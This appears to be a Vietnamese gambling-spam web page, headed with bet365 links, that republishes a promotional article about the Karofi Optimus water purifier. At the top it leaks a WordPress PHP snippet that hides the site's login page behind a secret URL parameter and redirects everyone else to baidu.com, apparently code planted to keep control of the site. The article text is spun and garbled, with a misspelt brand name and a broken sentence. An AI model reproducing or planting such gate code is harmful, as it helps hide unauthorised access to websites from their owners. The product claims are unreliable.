//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Karofi ra mắt sản phẩm mới mang tên Captain'Optimus ' | bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365

Karofi ra mắt sản phẩm mới mang tên Captain’Optimus ‘

Các fan của loạt phim “Transformers” vô cùng ngưỡng mộ nhân vật thuyền trưởng Optimus Prime. Máy lọc nước thông minh Karofi Optimus thế hệ mới được lấy cảm hứng từ tính cách tiên phong của người đội trưởng Optimus Prime, dẫn dắt đồng đội đánh bại cái ác, bảo vệ cuộc sống của người dân, hãng có nhiều lợi thế trong ngành. Công nghệ lọc nước và thiết kế khoa học thông minh mang đến nguồn nước an toàn và đảm bảo sức khỏe cho người sử dụng.

Khác với các sản phẩm Karofi trước đây, Optimus đã cải tiến ngoại hình bằng cách kết hợp hai màu đen trắng, dải màu thể hiện sự tinh tế và sang trọng. Vẻ ngoài của sản phẩm gây ấn tượng mạnh với người nhìn bởi sự sang trọng và lịch lãm, nó giống như một vật trang trí cho ngôi nhà hiện đại hơn là một chiếc máy lọc nước mà người tiêu dùng thường đặt trong nhà bếp.

Máy lọc nước Optimus Prime mới nhất của Carloffi. Máy lọc nước thông minh là ưu điểm nổi bật của thương hiệu Karofi, Optimus tiếp tục được trang bị màn hình hiển thị. Số TDS (tổng chất rắn hòa tan trong nước) cảnh báo tất cả các mối nguy hiểm, chẳng hạn như nguồn cung cấp nước không đủ, thay thế lõi nghiêm trọng và rò rỉ nước. .

Cấu trúc khoa học và vẻ ngoài sang trọng tạo cảm giác dễ chịu khi chạm vào các sản phẩm của Optimus.

Máy lọc nước thế hệ tiếp theo của Karofi cũng đã đầu tư vào màng lọc hàng đầu-màng Aqualast do Dow Chemical sản xuất. Màng thẩm thấu ngược thông thường chỉ có tỷ lệ thoát nước khoảng 40% và 60% đối với nước tinh khiết. Sau đó, qua màng Ro Aqualast của Karofi cho Optimus, tỷ lệ thu hồi nước tinh khiết đạt 70%. Ngoài ra, màng lọc này còn có thể tăng gấp đôi tuổi thọ và có thể xử lý được nhiều nguồn nước, như nước máy, nước giếng, nước lợ hay nước có TDS lên đến 3000 ppm. Hiệu suất của màng thẩm thấu ngược thông thường.

Máy lọc nước Karofi Optimus có nhiều ưu điểm vượt trội và được hơn 6000 đại lý Karofi kể trên áp dụng. Trên toàn quốc, tiếp tục giữ vững vị thế dẫn đầu thị trường ngành lọc nước Việt Nam.

Karofi là thương hiệu chuyên cung cấp các giải pháp lọc nước, trong đó máy lọc nước RO Karofi và thiết bị nước nóng lạnh là hai dòng sản phẩm đã được hơn một triệu hộ gia đình Việt Nam tin dùng. Đăng ký tại đây hoặc qua hotline 1900 6418 để trải nghiệm máy lọc nước Karofi Optimus .

(Nguồn: Karofi)

Leave a comment

bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365